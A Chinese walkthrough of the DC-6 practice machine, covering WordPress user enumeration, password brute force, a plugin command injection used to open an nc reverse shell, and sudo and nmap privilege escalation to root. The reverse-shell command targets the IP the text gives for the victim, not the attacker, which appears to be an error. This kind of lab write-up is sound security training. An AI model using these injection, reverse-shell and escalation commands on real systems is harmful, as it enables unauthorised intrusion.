渗透测试学习之靶机DC-6

1.下载靶机

本篇文章是DC靶机系列的第6篇,针对的是靶机DC-6,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。

DC-6的下载地址为DC: 6 ~ VulnHub。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。

DC-6只有一个flag。

在VMware加载成功之后并开启,建议把DC-6靶机的网络链接模式改为NAT模式。本文使用的攻击机为kali(安装在VMware上,IP为:192.168.88.128)。显示如下界面:

渗透测试学习之靶机DC-6_第1张图片 

2.收集靶机信息

由于本文的攻击机和靶机在同一个网络下,因此在kali上输入命令: arp-scan -l,显示如下

渗透测试学习之靶机DC-6_第2张图片

找到DC-6的IP地址为192.168.88.131,接下来使用nmap扫描该端口。

渗透测试学习之靶机DC-6_第3张图片

发现该靶机开启了80、22端口,80为web服务,我们访问http://192.168.88.131:80

发现访问失败,并且url被解析成了http://wordy/,这个问题和DC-2类似,需要在系统hosts文件上添加解析:

192.168.88.131 wordy

注意,如果是在kali虚拟机中添加,使用vim /etc/hosts 进行添加,此时只能使用kali虚拟机中的浏览器进行方法问;如果想在自己物理机上访问的话,需要在物理机的hosts文件添加上面语句。

然后在使用浏览器进行访问

渗透测试学习之靶机DC-6_第4张图片

此时的网站指纹为:

渗透测试学习之靶机DC-6_第5张图片

可以得到一个线索:该靶机的CMS系统为wordpress5.1.1。对于这个线索,我们有两个思路:

第一:利用目录扫描工具寻找该CMS的后台管理系统,然后再爆破密码和账号,进入后台管理系统寻找可利用的点。

第二:我们可以在网络上搜索该版本的漏洞,或者使用searchsploit,msfconsole等工具寻找漏洞及利用方法。

殊途同归,本文先循着第一个思路进行。这里利用dirb目录扫描工具寻找后台管理界面,当然也可以其他的工具,配合目录字典进行爆破,这里不详细展开。

渗透测试学习之靶机DC-6_第6张图片

结果中有一个http://192.168.88.131/wp-admin 我们尝试一下,果然是后台

渗透测试学习之靶机DC-6_第7张图片

这个思路和DC-2特别像。接着是爆破账号密码。盲猜一破admin admin,输入显示密码错误,随便输入一个admin0001,显示账号不存在。靶机回显处理的不好啊,说明admin是其中一个账号了。

继续爆破账号密码,使用针对该CMS的账号爆破工具wpscan,猜解密码:

输入命令行:wpscan --url http://wordy -e u

渗透测试学习之靶机DC-6_第8张图片

猜解出以上5个用户名,我们将其保存在一个DC-6-name.txt文件中(文件名自拟)。

接着利用cewl根据本文生成密码,然后再利用爆破工具暴力破解。本文利用cewl生成的密码都没破解出来,需要更强大的字典,这里有两个选择,一个是使用自己平时积累的密码字典破解,或者利用kali自带的密码字典,毕竟在下载靶机镜像的时候,作者已经提示了:

渗透测试学习之靶机DC-6_第9张图片

我们就使用kali自带的字典,根据提示,将字典到本地。

然后使用爆破工具进行爆破,可以使用bp,hydra,medusa等,本文还是选择wpscan工具

输入命令行:

wpscan --url http://wordy -P passwords.txt -U dc-6-name.txt

显然字典太大了,这是一个漫长的过程。最后结果是只爆破了mark helpdesk01。

利用这个账号密码登陆成功。

渗透测试学习之靶机DC-6_第10张图片

然后就开始360度无死角的检查该系统,寻找可利用的点,这里寻找到两个线索,第一:该网站使用了activity monitor工具,第二,在activity monitor目录的tools一栏存在可注入的点

渗透测试学习之靶机DC-6_第11张图片

这里输入IP或者数字,然后将用户的输入传到后台解析。

根据这两个线索,本文又有两个思路:

第一:既然会回传用户的输入到后台解析,那么是否可以修改数据包达到我们的目的呢?可以利用BP抓包测试。

第二:利用前文提到的漏洞扫描工具对activity monitor进行扫描,寻找历史漏洞。

本文利用第一个思路,输入souhu.com,点击lookup

渗透测试学习之靶机DC-6_第12张图片

开启bp抓包,并发送

渗透测试学习之靶机DC-6_第13张图片

然后将souhu.com改成souhu.com|whoami

渗透测试学习之靶机DC-6_第14张图片

发现管道符后面的whoami运行了。说明此处存在漏洞。

3.漏洞测试

接着利用该漏洞反弹一个shell。

首先在kali虚拟机上开启监听

将包改成 souhu.com|nc -e /bin/bash 192.168.88.131 7777

渗透测试学习之靶机DC-6_第15张图片 

可以看到shell已经回传到kali上了

我们利用python开启交互模式。输入命令

python -c 'import pty;pty.spawn("/bin/bash")'

渗透测试学习之靶机DC-6_第16张图片

交互模式成功,打开home目录,查找新的线索:

渗透测试学习之靶机DC-6_第17张图片

发现在mark目录下存在一个things-to-do文件,打开发现了graham的账号密码。

然后登陆graham的账号密码,发现登陆失败,想到该靶机还开启了22端口因此尝试ssh登录。

渗透测试学习之靶机DC-6_第18张图片

登陆成功。

5.漏洞利用

尝试一下sudo -l出现了免密的jens的命令

进入/home/jens目录,打开backups.sh文件

里面是一个压缩命令行,说明该文件可以运行,因此想到可以在该文件中添加/bin/bash语句,则可以打开jens的shell了。

echo '/bin/bash' >> backups.sh #在文件中添加命令行

sudo ./backups.sh #运行失败,因为此时是graham哟用户

sudo -u jens ./backups.sh #-u 指定用户

渗透测试学习之靶机DC-6_第19张图片

反弹了一个jens的shell。

发现jens可以免密码运行root权限nmap。此时想到nmap可以运行文件,那么我们写一个打开root shell的文件,再让nmap执行,就可以拿到root权限了

echo 'os.execute("/bin/sh")' >getshell.nse #写一个root shell的文件

sudo nmap --script=getshell.nse #运行

打开root目录,发现theflag.txt文件

渗透测试学习之靶机DC-6_第20张图片

拿到flag!

此外:

1.本文有两处地方有两个思路,由于我比较懒,就没有另外集中发思路的过程写下来,感兴趣的读者可以尝试!

你可能感兴趣的:(安全,安全,靶机,渗透测试,web安全,网络)